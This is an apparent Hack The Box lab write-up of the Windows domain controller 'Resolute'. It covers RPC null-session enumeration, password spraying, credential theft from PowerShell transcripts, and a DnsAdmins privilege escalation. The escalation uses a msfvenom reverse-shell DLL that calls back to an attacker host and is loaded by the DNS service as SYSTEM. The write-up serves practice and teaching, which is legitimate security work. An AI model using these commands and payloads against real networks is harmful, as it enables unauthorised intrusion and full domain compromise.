Resolute — 0xnrg.se

Hack The Box · Lab

MediumWindowsActive DirectoryPrivilege Escalation

IP: 10.10.10.169 | Difficulty: Medium | OS: Windows

Environment Setup

export IP=10.10.10.169
echo "10.10.10.169  resolute.megabank.local megabank.local" >> /etc/hosts

Step 1 — Port Scan

Why: Map the attack surface. Windows DC profile determines which protocols to enumerate first.

nmap -sC -sV -p- --min-rate 5000 -oN resolute.nmap 10.10.10.169

Output:

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds Windows Server 2016
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0

Key findings:

Classic Windows DC profile — DNS, Kerberos, RPC, LDAP, SMB, WinRM all exposed
WinRM on 5985 means valid credentials → instant shell if user is in Remote Management Users

Step 2 — RPC Null Session — User Enumeration

Why: RPC accepts unauthenticated binds on this host. Dump all domain users and descriptions — admins frequently leave credentials in the description field after provisioning accounts.

rpcclient -U "" -N 10.10.10.169 -c "enumdomusers"
rpcclient -U "" -N 10.10.10.169 -c "querydispinfo"

Output:

user:[Administrator] user:[ryan] user:[marko] user:[melanie] [+24 others]

index: 0xfb6 RID: 0x457 acb: 0x00000210 Account: marko
  Description: Account created. Password set to Welcome123!

Key findings:

marko has a plaintext password in the description field — common post-provisioning mistake
26 total domain users enumerated → spray target list
Password was likely never removed after account creation

Step 3 — Password Spray — melanie

Why: marko's credential is exposed but may have been changed. Spray Welcome123! across all enumerated users — provisioning passwords often get reused or left unchanged on other accounts.

crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success

Output:

[-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
...
[+] megabank.local\melanie:Welcome123!

Key findings:

marko changed his password — but melanie never changed the provisioning default
Valid foothold: melanie:Welcome123!

Step 4 — WinRM Foothold — melanie

Why: melanie is in Remote Management Users. WinRM gives us an interactive PowerShell session.

evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'

Output:

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami
megabank\melanie

Key findings: Shell obtained as melanie. user.txt on melanie's desktop.

Step 5 — PSTranscript Discovery — ryan's Password

Why: PowerShell transcript logging is enabled. Transcripts capture full command-line output including credentials passed as arguments. Hidden directories require -Force to list.

dir -force C:\
dir -force C:\PSTranscripts
dir -force C:\PSTranscripts\20191203
type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Output:

Directory: C:\PSTranscripts\20191203
-arh--  12/3/2019  6:45 AM  3732  PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

...
>> cmd /c net use X: \\fs01\backups ryan <REDACTED>
...

Key findings:

PSTranscripts directory is hidden (-arh--) — -Force required to see it
Admin ran net use interactively; transcript captured the full command including ryan's plaintext password
Lateral move ready: ryan:<REDACTED>

Step 6 — WinRM as ryan — DnsAdmins

Why: ryan's credentials retrieved from the transcript. Authenticate and enumerate group memberships.

evil-winrm -i 10.10.10.169 -u ryan -p '<REDACTED>'

Output:

*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups

MEGABANK\DnsAdmins    Alias    Mandatory group, Enabled by default, Enabled group

Key findings:

ryan is in DnsAdmins — members can configure the DNS service including loading a custom plugin DLL
DNS service runs as NT AUTHORITY\SYSTEM → DLL injection → SYSTEM

Step 7 — DnsAdmins Abuse — SYSTEM Shell

Why: DnsAdmins members can set ServerLevelPluginDll to an arbitrary UNC path. When the DNS service restarts, it loads the DLL as SYSTEM. We generate a reverse shell DLL, serve it over SMB, and register it via dnscmd.

# Attacker — generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.X LPORT=4444 -f dll -o rev.dll

# Serve via impacket
impacket-smbserver share . -smb2support

# Listener
nc -lvnp 4444

On target as ryan:

dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.X\share\rev.dll
sc.exe stop dns
sc.exe start dns

Output:

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

connect to [10.10.14.X] from [10.10.10.169] 49678
C:\Windows\system32> whoami
nt authority\system

Key findings:

DLL loaded by DNS service on restart — no privilege required beyond DnsAdmins membership
root.txt at C:\Users\Administrator\Desktop\root.txt
🏴 MACHINE PWNED — SYSTEM ACHIEVED

Credentials

Account	Password
melanie	Welcome123!
ryan

Full Attack Chain

RPC null session → enumdomusers + querydispinfo
  └─ marko description: "Password set to Welcome123!"
        └─ Password spray all users → melanie:Welcome123!
              └─ evil-winrm melanie → user.txt
                    └─ dir -force C:\ → hidden PSTranscripts directory
                          └─ transcript: net use ryan <password>
                                └─ evil-winrm ryan → DnsAdmins group
                                      └─ dnscmd /config /serverlevelplugindll → UNC rev.dll
                                            └─ sc stop/start dns → DLL loads as SYSTEM
                                                  🏴 ROOTED